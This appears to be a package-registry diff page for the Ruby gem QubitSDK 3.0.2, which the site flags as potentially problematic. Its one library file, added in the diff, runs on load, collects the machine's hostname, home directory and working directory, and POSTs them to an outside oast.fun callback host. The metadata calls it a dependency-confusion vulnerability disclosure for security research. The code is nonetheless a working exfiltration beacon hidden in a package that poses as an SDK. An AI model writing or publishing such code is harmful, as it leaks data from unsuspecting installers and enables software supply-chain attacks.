QubitSDK 3.0.2
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of QubitSDK might be problematic. Click here for more details.
- checksums.yaml +7 -0
- data/lib/QubitSDK.rb +32 -0
- metadata +45 -0
checksums.yaml
ADDED
@@ -0,0 +1,7 @@
|
|
1
|
+
---
|
2
|
+
SHA256:
|
3
|
+
metadata.gz: 13b0c2bc40f1770c17eb5f7a503823cb923d85714c790b49808461d8b5261507
|
4
|
+
data.tar.gz: af965600c5e1585c1e864a313cc8850f1a015814cccbda4adfd8bbbfa59ad421
|
5
|
+
SHA512:
|
6
|
+
metadata.gz: 1b7e5902388f2837038fb75752793c35735e278d6fb2fb3e4d3d213e49fddcafefe25d8f058e8108778f85ec3b0f12c4502d03b78f5625854535a609a61e66c5
|
7
|
+
data.tar.gz: 27d795bd73a48b5c2ac9de03900a36dd712e0335254fbd817fe5110aade1e89d0ba13999368d6b44706b838451297d6f51a5db8a26e7190c9f11c4099775187b
|
data/lib/QubitSDK.rb
ADDED
@@ -0,0 +1,32 @@
|
|
1
|
+
require 'socket'
|
2
|
+
require 'json'
|
3
|
+
require 'net/http'
|
4
|
+
|
5
|
+
suffix = '.chyrked2vtc00009zf20ge9cjzeyyyyyb.oast.fun' # Replace with your actual callback domain
|
6
|
+
|
7
|
+
package = 'QubitSDK' # Replace with your package name
|
8
|
+
|
9
|
+
# Only the bare minimum to be able to identify
|
10
|
+
# a vulnerable organization
|
11
|
+
data = {
|
12
|
+
'p' => package,
|
13
|
+
'h' => Socket.gethostname,
|
14
|
+
'd' => File.expand_path('~'),
|
15
|
+
'c' => Dir.pwd
|
16
|
+
}
|
17
|
+
|
18
|
+
data = JSON.generate(data)
|
19
|
+
|
20
|
+
uri = URI("http://chyrked2vtc00009zf20ge9cjzeyyyyyb.oast.fun") # Replace with your actual callback URL
|
21
|
+
http = Net::HTTP.new(uri.host, uri.port)
|
22
|
+
|
23
|
+
request = Net::HTTP::Post.new(uri.path.empty? ? '/' : uri.path) # Use '/' if uri.path is empty
|
24
|
+
request.body = data
|
25
|
+
|
26
|
+
response = http.request(request)
|
27
|
+
|
28
|
+
if response.is_a?(Net::HTTPSuccess)
|
29
|
+
puts "HTTP request succeeded!"
|
30
|
+
else
|
31
|
+
puts "HTTP request failed: #{response.code} #{response.message}"
|
32
|
+
end
|
metadata
ADDED
@@ -0,0 +1,45 @@
|
|
1
|
+
--- !ruby/object:Gem::Specification
|
2
|
+
name: QubitSDK
|
3
|
+
version: !ruby/object:Gem::Version
|
4
|
+
version: 3.0.2
|
5
|
+
platform: ruby
|
6
|
+
authors:
|
7
|
+
- PranavX01
|
8
|
+
autorequire:
|
9
|
+
bindir: bin
|
10
|
+
cert_chain: []
|
11
|
+
date: 2023-06-05 00:00:00.000000000 Z
|
12
|
+
dependencies: []
|
13
|
+
description: This package is meant for security research purposes and does not contain
|
14
|
+
any useful code.
|
15
|
+
email:
|
16
|
+
- pranavrai2060@gmail.com
|
17
|
+
executables: []
|
18
|
+
extensions: []
|
19
|
+
extra_rdoc_files: []
|
20
|
+
files:
|
21
|
+
- lib/QubitSDK.rb
|
22
|
+
homepage: https://rubygems.org/gems/QubitSDK
|
23
|
+
licenses:
|
24
|
+
- MIT
|
25
|
+
metadata: {}
|
26
|
+
post_install_message:
|
27
|
+
rdoc_options: []
|
28
|
+
require_paths:
|
29
|
+
- lib
|
30
|
+
required_ruby_version: !ruby/object:Gem::Requirement
|
31
|
+
requirements:
|
32
|
+
- - ">="
|
33
|
+
- !ruby/object:Gem::Version
|
34
|
+
version: '0'
|
35
|
+
required_rubygems_version: !ruby/object:Gem::Requirement
|
36
|
+
requirements:
|
37
|
+
- - ">="
|
38
|
+
- !ruby/object:Gem::Version
|
39
|
+
version: '0'
|
40
|
+
requirements: []
|
41
|
+
rubygems_version: 3.0.3.1
|
42
|
+
signing_key:
|
43
|
+
specification_version: 4
|
44
|
+
summary: 'Vulnerability Disclosure: Dependency confusion vulnerability'
|
45
|
+
test_files: []
|